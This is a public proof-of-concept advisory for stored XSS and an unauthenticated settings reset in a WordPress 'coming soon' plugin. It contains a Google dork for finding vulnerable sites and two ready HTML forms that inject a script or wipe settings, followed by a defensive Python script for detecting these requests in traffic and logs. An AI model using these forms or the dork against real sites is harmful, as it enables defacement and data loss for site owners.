/*!
* # Exploit Title: Coming Soon Page & Maintenance Mode v1.7.8 Unauthenticated Persistent XSS Injection
* # Google Dork: inurl:"wp-content/plugins/responsive-coming-soon"
* # Date: 2019/07/20
* # Original researcher: Ryan Dewhurst [twitter.com/ethicalhack3r]
* # PoC Author: m0ze
* # Vendor Homepage: https://wpshopmart.com/
* # Software Link: https://wordpress.org/plugins/responsive-coming-soon/
* # Version: <= 1.7.8
* # Tested on: WordPress v5.2.2 + Coming Soon Page & Maintenance Mode v1.7.8
* # CVE: -
* # CWE: CWE-79
*/
::- Details & Description -::
~ The «Coming Soon Page & Maintenance Mode» plugin, which has more than 7.000 active installations, was vulnerable to persistent XSS injection and to an unauthenticated settings reset: an unauthenticated attacker could inject JavaScript or HTML code into the blog front-end, or simply erase all existing settings.
::- Special Note -::
~ Please note that I'm not the original researcher; I'm making the PoC public.
::- PoC [Unauthenticated Persistent XSS Injection] -::
~ Simple POST request, no auth is needed.
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"></head>
<body>
<form action="http://victimdomain.com/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon" method="POST">
<input type="hidden" name="action_rcs" value="action_rcs_page_setting_save_post" />
<input type="hidden" name="hook" value="general" />
<input type="hidden" name="rcsp_logo_url" value="http://victimdomain.com/wp-content/plugins/responsive-coming-soon/img/wp.png" />
<input type="hidden" name="logo_width" value="13" />
<input type="hidden" name="logo_height" value="13" />
<input type="hidden" name="logo_enable" value="on" />
<input type="hidden" name="rcsp_headline" value="m0ze was here" />
<input type="hidden" name="rcsp_description" value="<script>alert('m0ze');</script>" />
<input type="hidden" name="home_sec_link_txt" value="m0ze" />
<input type="submit" value="Submit Data" />
</form>
</body>
</html>
::- PoC [Unauthenticated Settings Reset] -::
~ Another simple POST request, no auth is needed.
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"></head>
<body>
<form action="http://victimdomain.com/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon" method="POST">
<input type="hidden" name="action_rcs_reset" value="action_rcs_page_setting_reset_post" />
<input type="hidden" name="hook" value="general" />
<input type="submit" value="Submit Data" />
</form>
</body>
</html>
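Both PoCs above post to the same endpoint (admin-post.php?page=wpsm_responsive_coming_soon) and are told apart only by the form field they carry (action_rcs vs. action_rcs_reset). The following is an added triage example, not code from the advisory, the plugin or its vendor: it classifies a request the way a WAF or reverse proxy would see it, flags plugin actions submitted without a WordPress login cookie, lists form fields carrying HTML tags, and scans combined-format access-log lines for hits on the endpoint. The endpoint, query parameter and field names are copied from the PoC forms; the request bodies, log lines and the wordpress_logged_in_ cookie heuristic are assumptions of this example.

```python
# Added example (not from the advisory or the plugin): request/log triage for the
# unauthenticated settings-save and settings-reset requests the PoCs above send.
# Endpoint, query parameter and form field names are copied from the PoC forms;
# the sample log lines and request bodies below are constructed for this example.
import re
from urllib.parse import parse_qs, urlencode, urlsplit

TARGET_PATH = "/wp-admin/admin-post.php"      # from the PoC form action
TARGET_PAGE = "wpsm_responsive_coming_soon"   # from the PoC form action
SAVE_FIELD = "action_rcs"                     # from PoC 1 (settings save)
RESET_FIELD = "action_rcs_reset"              # from PoC 2 (settings reset)

# Any HTML tag in a submitted value; the page's payload is <script>...</script>.
HTML_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
# Apache/nginx combined log format: only method, URL and status are needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')


def hits_plugin_endpoint(method, url):
    """True when the request is a POST to the plugin's admin-post.php page."""
    parts = urlsplit(url)
    if method.upper() != "POST" or parts.path != TARGET_PATH:
        return False
    return TARGET_PAGE in parse_qs(parts.query).get("page", [])


def classify_request(method, url, body="", cookie_header=""):
    """Triage one HTTP request as a WAF or reverse proxy would see it.

    kind        : 'settings_save', 'settings_reset' or None
    html_fields : form fields whose value contains an HTML tag
    suspicious  : plugin action submitted without a WordPress login cookie
    The wordpress_logged_in_* cookie check is a heuristic (assumption of this
    example): it shows a login cookie is present, not that it is valid.
    """
    verdict = {"kind": None, "html_fields": [], "suspicious": False}
    if not hits_plugin_endpoint(method, url):
        return verdict
    params = parse_qs(body, keep_blank_values=True)
    if RESET_FIELD in params:
        verdict["kind"] = "settings_reset"
    elif SAVE_FIELD in params:
        verdict["kind"] = "settings_save"
    verdict["html_fields"] = sorted(
        name for name, values in params.items()
        if any(HTML_TAG_RE.search(v) for v in values))
    logged_in = "wordpress_logged_in_" in cookie_header
    verdict["suspicious"] = verdict["kind"] is not None and not logged_in
    return verdict


def scan_access_log(lines):
    """Return one record per POST to the plugin endpoint found in access-log lines.

    Access logs carry no request body, so this cannot tell save from reset or
    see injected markup; it only surfaces who hit the endpoint and when.
    """
    found = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and hits_plugin_endpoint(m["method"], m["url"]):
            found.append({"ip": m["ip"], "time": m["ts"], "status": m["status"]})
    return found


# Request bodies equivalent to the two PoC forms above (field values from the page).
POC_SAVE_BODY = urlencode({
    "action_rcs": "action_rcs_page_setting_save_post", "hook": "general",
    "rcsp_headline": "m0ze was here",
    "rcsp_description": "<script>alert('m0ze');</script>",
})
POC_RESET_BODY = urlencode({
    "action_rcs_reset": "action_rcs_page_setting_reset_post", "hook": "general"})

# Constructed sample log lines: one plugin hit, one unrelated request.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [20/Jul/2019:10:15:32 +0000] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/Jul/2019:10:16:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    url = "http://victimdomain.com" + TARGET_PATH + "?page=" + TARGET_PAGE
    print(classify_request("POST", url, POC_SAVE_BODY))
    print(classify_request("POST", url, POC_RESET_BODY, "wordpress_logged_in_abc=1"))
    print(scan_access_log(SAMPLE_LOG_LINES))
```

Since access logs do not record POST bodies, scan_access_log only tells you that the endpoint was hit; to distinguish a save from a reset, or to see the injected markup, feed classify_request from a WAF, reverse-proxy or application-level log that captures the form body. A POST to this endpoint with no wordpress_logged_in_ cookie is the pattern both PoCs produce and is the one to alert on until the plugin is updated past 1.7.8.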